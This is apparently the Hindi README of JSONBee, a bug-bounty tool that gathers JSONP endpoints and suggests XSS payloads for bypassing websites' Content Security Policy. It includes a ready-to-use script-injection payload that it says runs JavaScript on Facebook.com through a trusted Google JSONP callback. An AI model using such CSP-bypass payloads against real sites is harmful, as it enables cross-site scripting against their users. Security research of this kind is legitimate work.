
विभिन्न वेबसाइटों की सामग्री सुरक्षा नीति (CSP) को बायपास करने में मदद करने के लिए तैयार JSONP endpoints/payloads का एक सेट।
विभिन्न वेबसाइटों की सामग्री सुरक्षा नीति (CSP) को बायपास करने में मदद करने के लिए तैयार उपयोग JSONP एंडपॉइंट्स।
यह उपकरण HackIT 2018 के दौरान कीव में प्रस्तुत किया गया था। प्रस्तुति यहाँ पाई जा सकती है (पता नहीं क्यों स्लाइड्स का फॉर्मेट खराब है :D): https://www.slideshare.net/Hacken_Ecosystem/ebrahem-hegazy-bug-hunters-manual-for-bypassing-contentsecuritypolicy
इस उपकरण के पीछे मुख्य विचार JSONP एंडपॉइंट(s) को खोजना है जो आपको आपकी लक्ष्य वेबसाइट के लिए सामग्री सुरक्षा नीति को स्वचालित तरीके से बायपास करने में मदद करेंगे। JSONBee एक URL नाम (जैसे https://www.facebook.com) का इनपुट लेता है, CSP (सामग्री-सुरक्षा-नीति) को पार्स करता है, और स्वचालित रूप से XSS पेलोड सुझाता है जो CSP को बायपास करेगा। यह मुख्य रूप से मेरी बग बाउंटी हंटिंग गतिविधियों के दौरान एकत्रित JSONP एंडपॉइंट्स पर केंद्रित है, और CSP को बायपास करने के लिए उपयोग किया जा सकता है।
JSONBee JSONP एंडपॉइंट्स एकत्र करने के लिए 3 विधियों पर निर्भर करता है:
उपकरण अभी तक पूरी तरह से पूर्ण नहीं है क्योंकि मैं अभी भी कुछ मान्यताओं और सुविधाओं को जोड़ रहा हूँ। हालांकि, रिपॉजिटरी यहाँ होस्ट की जाएगी ताकि कोई भी उपकरण तैयार होने तक इसका उपयोग कर सके।
रिपॉजिटरी में उपयोग के लिए तैयार पेलोड्स हैं जो Facebook.com, Google.com और अधिक के लिए CSP को बायपास कर सकते हैं।
Facebook.com की सामग्री-सुरक्षा नीति को बायपास करना:
Facebook.com अपनी CSP नीति (script-src निर्देश) में *.google.com की अनुमति देता है, इस प्रकार, नीचे दिया गया पेलोड Facebook.com पर JavaScript निष्पादित करने के लिए बिल्कुल सही काम करेगा:
"><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
यदि आप किसी ऐसी वेबसाइट पर आते हैं जो अपने script-src निर्देश में jsonp.txt फ़ाइल में किसी भी डोमेन पर भरोसा करती है, तो उस डोमेन से मेल खाने वाला पेलोड चुनें और मज़ा करें :)
आप सभी का स्वागत है कि आप JSONP एंडपॉइंट्स/कॉलबैक का उपयोग करने वाली साइटों के लिंक जोड़कर योगदान दें ताकि रिपॉजिटरी को बड़ा और बग हंटर्स, पेंटेस्टर्स और सुरक्षा शोधकर्ताओं के लिए अधिक उपयोगी बनाया जा सके।